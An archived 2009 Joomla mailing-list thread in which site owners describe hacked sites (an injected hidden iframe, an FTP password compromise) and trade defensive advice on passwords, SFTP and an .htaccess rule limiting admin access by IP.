But why are you using javascript for your menus... ;) /runs to twitter
Barrie North ~Fully Managed Joomla Sites~ www.simplweb.com/joomla ~Join the Community at compassdesigns.net~ www.compassdesigns.net/join-the-community.html On Thu, Mar 26, 2009 at 8:40 PM, Mitch Pirtle <mitch.pir...@gmail.com>wrote: > This information is unfortunately too late for Barrie, but I have > found vsftpd (Very Secure FTP Daemon) not only secure but wikkid fast > to boot. It supports SFTP, so folks that don't have SSH/SCP can still > use a half-decent client and run over a moderately encrypted > connection. > > As for the defense of folks running PHP4, mass shared hosting, and > whatnot... I just made an off-hand comment a few seconds ago regarding > folks using outdated javascript menus that search bots could not > parse: > > "If you're not keeping up with the times, don't expect your website to > perform well." > > I cannot stress that enough. Seriously. Don't take your horse and cart > on the information superhighway; and if that is all you can afford, > perhaps you need to save up before you take that first ride, and for > certain stay well away from the fast lane. Just like starting a > business - if you cannot pony up the funds required to incorporate a > legitimate entity, don't expected to be treated like a legitimate > entity! > > I know it may sound harsh, maybe I'm just grumpy from working too many > hours. > > -- Mitch, grumpy from working too many hours > > 2009/3/26 Barrie North <bar...@compassdesigns.net>: > > We found the attacks/IP in the server logs. A financially backed hacker > > outfit from Nigeria, go figure. The joys of having a PR9 site =P > > > > Our password was 10 chars including letters, numbers and punctuation. We > are > > hosted on a "secured" rackspace server. > > > > We don't have FTP running any more! > > > > Barrie North > > ~Fully Managed Joomla Sites~ > > www.simplweb.com/joomla > > ~Join the Community at compassdesigns.net~ > > www.compassdesigns.net/join-the-community.html > > > > > > On Thu, Mar 26, 2009 at 7:29 PM, Atir Javid <atirja...@gmail.com> wrote: > >> > >> Hello Barrie, > >> > >> May I inquire as to how you verified the attack? I know that FTP > >> bruteforcing is extremely difficult, and that is very improbable. > >> What you may have faced was a dictionary attack, which may have worked > >> with some luck if you had a weak password. A password including a mix > >> of > >> > >> 1) UPPERCASE > >> 2) lowercase > >> 3) punctuation/!#$., > >> 4) numbers > >> > >> and have a good strong/long password you would never fall victim to > >> dictionary. > >> > >> As for bruteforce, an ftpd simply denies access after 3 or 5 > >> (configurable, usually defaults to 3) failed login attempts for some > >> time. Some hosts go as far as restricting ftp access until you call > >> them and verify the problem. Also, brute forcing over a TCP pipe a > >> slow protocol such as FTP is virtually impossible. At this rate it > >> would take YEARS to bruteforce the password if not DECADES. > >> > >> @ Other users > >> Also make sure to go into joomla user configuration and change the > >> username of 'admin' to something else. > >> To protect your joomla administation section If you have a static ip, > >> you can add > >> > >> order allow,deny > >> deny from all > >> allow from your.static.ip.here > >> > >> to a file called .htaccess in your administration folder. If for some > >> reason your ip changes and you get locked out, simply login via FTP > >> and update the .htaccess file. There are some other advanced methods > >> for protecting your administration folder. > >> > >> Also, FTP was a protocol developed 30+ years ago. It is not secure, > >> clear text authentication, etc. FTP must go. If you can help it, do > >> not use ftp, instead SFTP, or SSH. Just.. anything but FTP. Sadly, > >> thats all that is easy to use, highly available across all hosts, and > >> not everyone on shared hosting provides SSH access. If you can do > >> without it, do without it. http://wooledge.org/mywiki/FtpMustDie > >> > >> I have seen more sites hacked due to unpatched php or bad php > >> code(mostly from 3rd party addons) more than I have with FTP though. > >> > >> Still with good security practices you can reduce the risk considerably. > >> > >> Peace. > >> > >> > >> > >> > >> 2009/3/26 Barrie North <bar...@compassdesigns.net>: > >> > We got hacked last month by a brute force attack on our FTP password. > >> > Once > >> > they had that, they got into the Joomla files. > >> > > >> > Any site can be hacked. The other half of the equation is vigilance > and > >> > backups :) > >> > > >> > Barrie North > >> > ~Fully Managed Joomla Sites~ > >> > www.simplweb.com/joomla > >> > ~Join the Community at compassdesigns.net~ > >> > www.compassdesigns.net/join-the-community.html > >> > > >> > > >> > On Wed, Mar 25, 2009 at 11:23 PM, Mark Simko <masi...@verizon.net> > >> > wrote: > >> >> > >> >> Several of my clients' 1.0.15 sites have been hacked this week! Is > >> >> there a problem with 1.0? > >> >> > >> >> I don't see an announcement on joomla.org > >> >> > >> >> I just saw that my site was hacked the other day. Fortunately they > >> >> bunged it up a bit, so the code didn't run, but instead gave an error > >> >> message. > >> >> > >> >> What they had done is append javascript to the index.php file. It was > >> >> disguised as ascii codes, and there were several var defined and > >> >> substituted in, but the result was that it attempted to open a hidden > >> >> iframe directed to siplank.com. When I tried to open siplank.com in > a > >> >> web browser (yes, I did that! I do lots of crazy things out of > >> >> curiosity) Firefox stopped it with a warning about the site being > known > >> >> for malware. > >> >> > >> >> I'm running 1.5.9 on a shared host. I will be calling my host and > >> >> asking > >> >> them what they can find out from their logs as to what happened. > >> >> > >> >> _______________________________________________ > >> >> New York PHP SIG: Joomla! Mailing List > >> >> http://lists.nyphp.org/mailman/listinfo/joomla > >> >> > >> >> NYPHPCon 2006 Presentations Online > >> >> http://www.nyphpcon.com > >> >> > >> >> Show Your Participation in New York PHP > >> >> http://www.nyphp.org/show_participation.php > >> > > >> > > >> > _______________________________________________ > >> > New York PHP SIG: Joomla! Mailing List > >> > http://lists.nyphp.org/mailman/listinfo/joomla > >> > > >> > NYPHPCon 2006 Presentations Online > >> > http://www.nyphpcon.com > >> > > >> > Show Your Participation in New York PHP > >> > http://www.nyphp.org/show_participation.php > >> > > >> _______________________________________________ > >> New York PHP SIG: Joomla! Mailing List > >> http://lists.nyphp.org/mailman/listinfo/joomla > >> > >> NYPHPCon 2006 Presentations Online > >> http://www.nyphpcon.com > >> > >> Show Your Participation in New York PHP > >> http://www.nyphp.org/show_participation.php > > > > _______________________________________________ > > New York PHP SIG: Joomla! Mailing List > > http://lists.nyphp.org/mailman/listinfo/joomla > > > > NYPHPCon 2006 Presentations Online > > http://www.nyphpcon.com > > > > Show Your Participation in New York PHP > > http://www.nyphp.org/show_participation.php > > > _______________________________________________ > New York PHP SIG: Joomla! Mailing List > http://lists.nyphp.org/mailman/listinfo/joomla > > NYPHPCon 2006 Presentations Online > http://www.nyphpcon.com > > Show Your Participation in New York PHP > http://www.nyphp.org/show_participation.php >
_______________________________________________ New York PHP SIG: Joomla! Mailing List http://lists.nyphp.org/mailman/listinfo/joomla NYPHPCon 2006 Presentations Online http://www.nyphpcon.com Show Your Participation in New York PHP http://www.nyphp.org/show_participation.php
